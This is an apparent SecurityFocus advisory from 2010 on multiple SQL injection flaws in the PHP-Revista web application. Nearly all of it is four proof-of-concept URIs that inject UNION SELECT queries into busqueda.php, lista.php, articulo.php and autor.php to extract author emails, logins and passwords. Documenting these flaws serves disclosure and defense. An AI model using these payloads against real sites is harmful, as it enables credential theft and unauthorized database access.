PHP-Revista Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/revista/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*

http://www.example.com/revista/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*

http://www.example.com/revista/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*

http://www.example.com/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1


 

Privacy Statement
Copyright 2010, SecurityFocus